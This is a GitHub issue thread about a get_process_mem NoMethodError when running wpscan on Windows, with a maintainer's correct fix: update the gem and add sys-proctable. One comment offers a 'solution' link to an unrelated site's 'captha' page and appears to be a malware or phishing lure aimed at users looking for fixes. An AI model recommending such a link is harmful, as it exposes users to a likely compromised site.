### ISSUE TITLE
get_process_mem error while trying to run wpscan

### ISSUE THREAD

**Issue by Motil3** [wpscanteam/wpscan#1864]
It might be a mistake on my end. but I'm trying to run wpscan on ruby on windows 10 and I get this error:

```

> C:/Ruby33-x64/lib/ruby/gems/3.3.0/gems/get_process_mem-0.2.6/lib/get_process_mem.rb:113:in `ps_memory': undefined method `working_set_size' for nil (NoMethodError)
> 
>       size = ProcTable.ps(pid: pid).working_set_size
>                                    ^^^^^^^^^^^^^^^^^
>         from C:/Ruby33-x64/lib/ruby/gems/3.3.0/gems/get_process_mem-0.2.6/lib/get_process_mem.rb:62:in `bytes'
>         from C:/Ruby33-x64/lib/ruby/gems/3.3.0/gems/cms_scanner-0.14.3/lib/cms_scanner/scan.rb:9:in `initialize'
>         from C:/Ruby33-x64/lib/ruby/gems/3.3.0/gems/wpscan-3.8.27/bin/wpscan:6:in `new'
>         from C:/Ruby33-x64/lib/ruby/gems/3.3.0/gems/wpscan-3.8.27/bin/wpscan:6:in `<top (required)>'
>         from C:/Ruby33-x64/bin/wpscan:32:in `load'
>         from C:/Ruby33-x64/bin/wpscan:32:in `<main>'

```

**Comment by Siphompeks** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by erwanlr** [comment]
That's an issue with the `get_process_mem` gem, not WPScan itself. Try updating the gem (you are two versions behind), and check the [readme](https://github.com/zombocom/get_process_mem?tab=readme-ov-file#install) of the gem which contains

```
if you're using Windows you'll also need to have the sys-proctable gem.
```
